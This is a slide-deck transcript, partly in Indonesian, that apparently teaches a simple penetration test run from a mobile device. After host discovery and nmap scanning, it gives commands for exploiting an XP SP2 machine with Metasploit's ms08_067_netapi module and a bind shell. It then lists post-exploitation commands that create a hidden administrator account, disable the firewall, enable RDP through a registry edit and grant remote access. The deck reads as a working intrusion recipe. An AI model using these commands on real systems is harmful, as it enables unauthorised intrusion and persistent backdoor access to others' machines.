fit 13 penetration test 1
TRANSCRIPT
![Page 1: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/1.jpg)
http://www.flickr.com/photos/32615508@N02/3047982712
{network security part 1}Penetration test sederhana dengan mobile device...
![Page 2: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/2.jpg)
{network scan}Host discovery, find the targets
![Page 3: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/3.jpg)
StumblerPlus , iWep PRO
![Page 4: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/4.jpg)
iNet , Snap: Mobile version of pinger/scanner (ex: Angry IP Scanner)
![Page 5: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/5.jpg)
{deeper profiling}Port scanning, OS detection etc.
![Page 6: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/6.jpg)
Nmap 5.00Jailbroken iPhone etc.
$> nmap -O 192.168.5.44
Aha, microsoft-ds (port 445)plus XP SP2...
![Page 7: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/7.jpg)
Or else...
$> nmap -p 445 192.168.5.0/24
![Page 8: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/8.jpg)
{penetrations}Using exploits etc.
![Page 9: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/9.jpg)
Metasploit Framework
$> msfconsole
Easy, many modules, reular updates, Ruby, can run nmap too.
![Page 10: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/10.jpg)
Use Proper Modules
$> use windows/smb/ms08_067_netapi$> show options$> show payloads
Security knowledge & deduction
![Page 11: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/11.jpg)
Set Options
$> set payload windows/shell_bind_tcp$> set rhost 192.168.5.44$> exploit
![Page 12: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/12.jpg)
Welcome to C: Prompt
$> ipconfig$> dir$> net user$> net user guestboss guestboss /add$> net localgroup Administrators /add guestboss$> echo “P4wned!” > "c:\Documents and Settings\guestboss\Desktop\Hello.txt"
![Page 13: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/13.jpg)
Shutdown Firewalll & Enable RDP
$> set opmode mode = DISABLE exceptions = ENABLE
$> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
$> net localgroup "Remote Desktop Users" /add guestboss
![Page 14: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/14.jpg)
{conclusions?}..............................
![Page 15: Fit 13 penetration test 1](https://reader031.vdocuments.net/reader031/viewer/2022013121/5584c439d8b42af8138b4677/html5/thumbnails/15.jpg)
Q & A